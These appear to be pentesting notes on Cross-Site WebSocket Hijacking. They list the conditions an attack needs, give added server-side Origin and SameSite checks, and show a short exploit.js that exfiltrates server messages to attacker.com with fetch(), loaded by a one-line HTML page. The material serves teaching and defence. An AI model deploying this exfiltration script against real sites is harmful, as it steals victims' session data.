WebSockets
WebSockets let the browser and server talk to each other at the same time using one connection that stays open. After a handshake, the connection stays active, and both sides can send messages whenever they want — like a two-way conversation. The server can also send updates to the browser right away when something happens.
- WebSocket schemes:
  - `wss://`: WebSocket Secure, data is encrypted with TLS
  - `ws://`: data is sent without encryption
Exploit
Cross-Site WebSocket Hijacking
Identify whether the server validates the `Origin` header, and whether the session is exploitable cross-site:
- Spoof the `Origin` header on the handshake request and check that the server still accepts the connection
- Check that the auth cookies have the `SameSite` flag set to `None` (otherwise the browser does not attach them to a handshake started from another site)
Note: it is not possible to exploit CSWSH if the victim uses Firefox, due to Total Cookie Protection.
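The two conditions above are what a server-side fix has to close. The following is an added example (not code from the original notes) showing the defender's side: an exact-match `Origin` allow-list applied to the HTTP upgrade request, and a `Set-Cookie` parser that flags session cookies configured with `SameSite=None`. The origins, cookie names and the sample handshake headers are constructed values.

```javascript
// Added example, not code from the original notes: server-side checks that stop
// Cross-Site WebSocket Hijacking. (1) the handshake Origin must match an
// allow-list exactly; (2) the session cookie must not be SameSite=None.
// All origins, cookie names and the sample handshake below are constructed.

// Exact origins (scheme://host[:port]) that may open a socket. Constructed value.
const ALLOWED_ORIGINS = new Set(["https://app.example.com"]);

// Takes the Origin header value from the upgrade request. Returns true only when
// it parses as a URL whose origin is on the allow-list. A missing Origin is
// rejected: browsers always send it on WebSocket handshakes. Exact-match
// comparison avoids the substring bypass where
// "https://app.example.com.attacker.example" contains "app.example.com".
function isAllowedOrigin(originHeader, allowed = ALLOWED_ORIGINS) {
  if (typeof originHeader !== "string" || originHeader.length === 0) return false;
  let parsed;
  try {
    parsed = new URL(originHeader); // "null" and garbage fail to parse -> rejected
  } catch {
    return false;
  }
  return allowed.has(parsed.origin);
}

// Parses one Set-Cookie header into { name, value, attrs }; attrs keys are
// lower-cased attribute names, values are the attribute values ("" for flags).
function parseSetCookie(setCookie) {
  const [pair, ...rest] = setCookie.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const attr of rest) {
    if (attr === "") continue;
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.attrs[key] = i === -1 ? "" : attr.slice(i + 1);
  }
  return cookie;
}

// True when the cookie is configured so a browser attaches it to a handshake
// started from another site, i.e. SameSite=None. A Lax or Strict cookie is not
// sent on a script-initiated cross-site handshake, which by itself blocks CSWSH.
function cookieIsSentCrossSite(setCookie) {
  const { attrs } = parseSetCookie(setCookie);
  return (attrs.samesite || "").toLowerCase() === "none";
}

// Gatekeeper for the upgrade request. `headers` is a plain object with
// lower-cased header names, as Node's http module delivers them.
// Returns { accept: boolean, reason: string }.
function checkHandshake(headers) {
  if (!isAllowedOrigin(headers.origin)) {
    return { accept: false, reason: `origin not allowed: ${headers.origin ?? "<missing>"}` };
  }
  return { accept: true, reason: "origin allow-listed" };
}

// Constructed sample: a handshake arriving from a page on another site.
const crossSiteHandshake = {
  host: "target.example",
  upgrade: "websocket",
  origin: "https://attacker.example",
  cookie: "session=abc123",
};
console.log(checkHandshake(crossSiteHandshake)); // { accept: false, reason: 'origin not allowed: https://attacker.example' }
console.log(cookieIsSentCrossSite("session=abc123; Secure; HttpOnly; SameSite=None")); // true
console.log(cookieIsSentCrossSite("session=abc123; Secure; HttpOnly; SameSite=Lax"));  // false
```

Run the `checkHandshake` gate before completing the 101 upgrade, and audit the application's `Set-Cookie` headers with `cookieIsSentCrossSite`; a session cookie that returns `true` is the one a hijacked connection would ride on. Note that the `Origin` check is the control that does not depend on browser cookie policy.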
exploit.js

```js
// Establish the WebSocket connection
const ws = new WebSocket('wss://target.com/chat');

// Send a message to the server once connected
ws.onopen = () => {
  ws.send("READY");
};

// Handle messages received from the server
ws.onmessage = (event) => {
  fetch('https://attacker.com?msg=' + btoa(event.data));
};
```

The HTML page that loads the script:

```html
<html>
  <head></head>
  <body>
    <script src="https://attacker.com/exploit.js"></script>
  </body>
</html>
```

- User opens the malicious HTML page.
- JavaScript runs automatically in the background and creates a WebSocket connection to the target server.
- Once connected, the victim's browser sends `READY`.
- When the server replies, the script:
  - receives the message,
  - encodes it as base64 with `btoa(...)`,
  - sends it to the attacker's server using `fetch('https://attacker.com?msg=' + btoa(event.data));`